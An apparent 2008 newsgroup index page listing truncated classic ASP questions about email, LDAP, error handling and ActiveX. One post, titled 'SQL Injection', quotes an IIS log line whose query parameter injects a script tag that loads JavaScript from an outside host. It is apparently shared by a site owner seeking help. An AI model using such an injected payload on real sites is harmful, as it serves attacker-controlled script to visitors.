Validation on email address
Tue, 17 Jun 2008 01:04:00 -0700
Hi,
Is there a way to validate an email address and to check whether it is
sendable?
Function EmailTo(ToEmail, FromEmail, strSubject, strBody)
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = strSubject
objMessage.From = FromEmail
objMessage.To = ToEmail
objMessage.HTMLBo ...
|
SQL Injection
Mon, 16 Jun 2008 18:27:50 -0400
- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
GET /sresult.asp
title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src=
http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
- - - - - - ...
|
LDAP version of winnt://.../user ?
Mon, 16 Jun 2008 08:14:51 -0700
I'm porting some code over to use ADS for user data lookup, but can't find
a clear reference anywhere to the old windows 2000 userid (the network
login). Does it still exist within LDAP, or will I have to match to sn &
givenName? ...
|
PDA wireless
Mon, 16 Jun 2008 07:38:01 -0700
I have a Web application that is written in ASP. It runs well on regular PC.
What is needed to make it run on PDA (wireless)? I want to buy a new PDA to
test the application. Is there a particular brand of PDA or operating system
that I should buy? Thanks. ...
|
newbiie (ish) getting the client URL when using custome errors asp ?
Sat, 14 Jun 2008 03:36:48 +0100
Im sure this is dead simple but
where do you find the URL causing the error ?
I am trying to catch bad directory references using IIS custom errors tab
It points to my error handler eg error404.asp
however when that executes Request("URL") it shows the address
of the error handler not the original addr ...
|
CDO, ASP and Email Form Problems
Fri, 13 Jun 2008 05:41:01 -0700
How do I alter the follow asp code so the from field produces the a friendly
address
"Name <something@changeme.com>"
Code is presently used.
<%
If Request.Form("btnSend").Count > 0 Then
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = Request.Form("subject")
objMessage.Sender ...
|
Re: a trappable error (c0000005)
Wed, 11 Jun 2008 04:22:50 -0700 (PDT)
Hi all,
I am getting the following error randomly, I cannot expalin the exact
scenario
Active Server Pages error 'ASP 0115'
Unexpected error
/wmweb/Save.Asp
A trappable error (C0000005) occurred in an external object. The
script cannot continue running.
Appreciated your help on this.
The Code :
<%@ ...
|
|
|
You are about to access a Activex component
Tue, 10 Jun 2008 20:35:00 -0700
Hi,
We are trying to access a .net dll based method from classic asp code. When
the method is accessed, system gives a message "You are about to access a
Activex component". How do we suppress or stop this message from interfering
method access.
Any help is appreciated.
SM
...
|
ASP.NET web app works on some, not all, workstations
Tue, 10 Jun 2008 16:40:00 -0700
I have a client that has contracted with a bank to process checks over the
Internet. The solution includes a check scanner and APS.NET web application.
The application does not work for all workstations at the client site.
There are two laptop computers than can run the web application and all it's
functi ...
|
MS XMLHTTP or File System Object to Get Content
Tue, 10 Jun 2008 13:46:44 -0700 (PDT)
The friendly URLs in ASP is the goal of my project. However, in ASP
there is no obvious page mapping as I researched compared to other
languages. What I mean is making www.site.com?page=Home being
www.site.com/home/.
One of the workaround I know is to use MS XMLHTTP request on
www.site.com/home/index.asp page w ...
|